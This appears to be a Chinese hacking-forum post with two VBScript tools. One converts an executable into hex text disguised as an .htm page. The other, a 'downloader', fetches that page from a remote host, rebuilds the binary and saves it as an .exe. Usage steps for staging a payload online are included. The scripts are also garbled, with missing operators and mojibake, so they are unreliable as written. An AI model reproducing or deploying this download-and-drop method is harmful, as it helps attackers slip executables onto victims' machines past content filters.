'code by xiaolu 'change by NetPatch on error resume next set arg=wscript.arguments if arg.count=0 then wscript.quit do while 1 fname=arg(0) err.number=0 Set Ado = CreateObject("adodb.stream") With Ado .Type = 1 .open .loadfromfile fname ss = .read End With if err.number>0 then if msgbox("文件打開錯誤!",1,"File2VBS")=2 then Wscript.quit else exit do end if loop if fname="" then Wscript.quit Set Fso=CreateObject("Scripting.FileSystemObject") Set File=fso.OpenTextFile(arg(0)".htm",2, True) File.write Bin2Str(ss) File.close Set fso=nothing Ado.close set Abo=nothing Function Bin2Str(Re) For i = 1 To lenB(Re) bt = AscB(MidB(Re, i, 1)) if bt 16 Then Bin2Str=Bin2Str"0" Bin2Str=Bin2Str Hex(bt) Next End Function
====================================== 下載者 down.vbs ============= [code] on error resume next set arg=wscript.arguments if arg.count=0 then wscript.quit 'code by NetPatch 'cscript down.vbs c:\good.exe Set Mail1 = CreateObject("CDO.Message") Mail1.CreateMHTMLBody arg(0),31 ss= Mail1.HTMLBody Set Mail1 = Nothing Set RS=CreateObject("ADODB.Recordset") L=Len(ss)/2 RS.Fields.Append "m",205,L RS.Open:RS.AddNew RS("m")=ssChrB(0) RS.Update ss=RS("m").GetChunk(L) Set s=CreateObject("ADODB.Stream") with s .Mode = 3 .Type = 1 .Open() .Write ss .SaveToFile arg(1),2 end with ================================== demo.htm內(nèi)容時用exe2hex.vbs轉(zhuǎn)EXE后獲得的 使用方法: 1.exe2hex.vbs 把exe轉(zhuǎn)成十六進制,放到網(wǎng)絡(luò)上 2.down.vbs http://xxx/demo.htm c:\good.exe